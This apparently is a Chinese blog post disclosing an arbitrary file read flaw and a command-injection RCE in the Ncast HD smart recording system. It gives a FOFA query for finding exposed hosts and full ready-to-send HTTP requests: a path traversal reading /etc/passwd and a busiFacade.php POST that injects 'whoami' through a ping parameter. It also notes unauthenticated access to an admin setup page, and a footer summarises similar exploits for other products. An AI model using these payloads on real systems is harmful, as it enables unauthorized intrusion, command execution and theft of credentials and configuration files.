首页 > 其他分享 >Ncast高清智能录播系统存在任意文件读取漏洞以及busiFacade RCE漏洞

Ncast高清智能录播系统存在任意文件读取漏洞以及busiFacade RCE漏洞

时间:2024-05-25 19:45:13浏览次数:14  
标签:zh Ncast 22 xxx Accept 录播 漏洞 RCE

漏洞描述

由于系统对用户输入的文件路径未进行充分验证,允许用户输入任意文件路径,导致存在任意文件读取漏洞,攻击者可以利用该漏洞获取系统配置文件、密码文件等。该系统的/classes/common/busiFacade.php接口存在RCE漏洞,攻击者可以利用此漏洞执行任意命令。

fofa

app="Ncast-产品" && title=="高清智能录播系统"

poc

任意文件读取漏洞

GET /developLog/downloadLog.php?name=../../../../etc/passwd HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1

RCE漏洞

POST /classes/common/busiFacade.php HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 146
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20whoami%22%5D%7D

漏洞复现

image-20240523152232116

image-20240523152348617

任意文件读取:

image-20240523152923080

RCE:

以游客进行登录

image-20240525182007782

image-20240525182033342

可以直接未授权访问/manager/IPSetup.php

image-20240525182152731

image-20240525182222386

标签:zh,Ncast,22,xxx,Accept,录播,漏洞,RCE
From: https://www.cnblogs.com/LeouMaster/p/18212925

相关文章

  • EasyCVR视频管理平台存在任意用户添加漏洞
    漏洞描述攻击者可以通过发送特定的POST请求,利用未授权访问的接口'/api/v1/adduser',在系统中添加任意用户,并将其设置为管理员角色。fofaapp="EasyCVR-视频管理平台"pocpassword为md5加密POST/api/v1/adduserHTTP/1.1Host:xxx.xxx.xxx.xxxContent-Type:application/x-ww......
  • GeoServer系统wms接口存在远程命令执行漏洞
    漏洞描述该漏洞存在于GeoServer系统的/goserver/wms接口处,攻击者可以利用该漏洞在xml中包含恶意的代码执行任意系统命令,漏洞利用了GeoServer处理WebProcessingService请求时没有正确过滤用户输入,从而导致远程命令执行漏洞。fofaicon_hash="97540678"pocPOST/geoserver/wms......
  • Gradio存在任意文件读取漏洞(CVE-2024-1561)
    漏洞描述该漏洞是Gradio应用中的一个高危漏洞,其出现在'component_server'端点,允许攻击者调用'Component'类的任意方法,并利用'Block'类的'move_resource_to_block_cache()'方法在文件系统上复制任意文件到临时目录,随后可将其检索。这是的攻击者能够在未经授权的情况下读取本地文件......
  • [SCTF 2021]loginme go语言ssti漏洞
    今天做个新颖的题,go中的ssti问题。进来点击访问/admin/index?id=1发现空白,只有admin能看,看看源码main.go。点击查看代码packagemainimport( "html/template" "loginme/middleware" "loginme/route" "loginme/templates" "github.com/gin-gonic/gin&quo......
  • 红队攻防渗透技术实战流程:云安全之云原生安全:K8s安全etcd Dashboard Configfile漏洞
    红队云攻防实战1.云原生安全-K8s安全-Kubelet漏洞利用1.1K8s安全-Master节点漏洞利用-2379端口etcd未授权访问1.1.1K8s安全-Master节点漏洞利用-etcd未授权的几种利用方式1.1.2K8s安全-Master节点漏洞利用-etcd未授权-V2版本利用1.1.3K8s安全-Master节点漏......
  • XXL-JOB executor 未授权访问漏洞
    XXL-JOBexecutor未授权访问漏洞XXL-JOB是一个分布式任务调度平台,其核心设计目标是开放迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证......
  • .NET漏洞分析 | 绕过某和OA全局权限验证
    01阅读须知文章首发:先知社区,原文地址:https://xz.aliyun.com/t/14517此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接......
  • 哪类漏洞容易被攻破
    这个取决于多种因素,包括漏洞的严重程度、攻击者的技术能力和资源、目标系统的安全配置等。然而,一些常见的漏洞类型由于其普遍性和严重性,往往更容易被攻破。例如,跨站脚本(XSS)漏洞是一种非常常见的安全漏洞,攻击者可以在网页中插入恶意代码,利用浏览器执行这些代码来窃取用户信息......
  • windows服务器 启用 TLS 1.0 ,1.1漏洞问题修复记录
     测试对象:windowsserver2016或2019IIS,sqlserver2014布署的网站启https证书绑定安全检查有漏洞 启用TLS1.0高危,1.1漏洞中危问题修复记录 IISCryptohttps://www.nartac.com/Products/IISCrypto/DownloadIISCrypto是一个免费工具,使管理员能够在WindowsServer......
  • Windows server高危漏洞 - 目标主机使用了不受支持的SSL加密算法
    系统扫描出高危漏洞:目标主机使用了不受支持的SSL加密算法。 修复过程:使用IISCrypto工具,下载地址:NartacSoftware-IISCrypto1.打开工具,点击“BestPractices”后,会自动反选掉一些选项,如下图,根据解决建议,手动反选掉TLS1.0和TLS1.1。然后Apply,重启服务器。 2. 服务......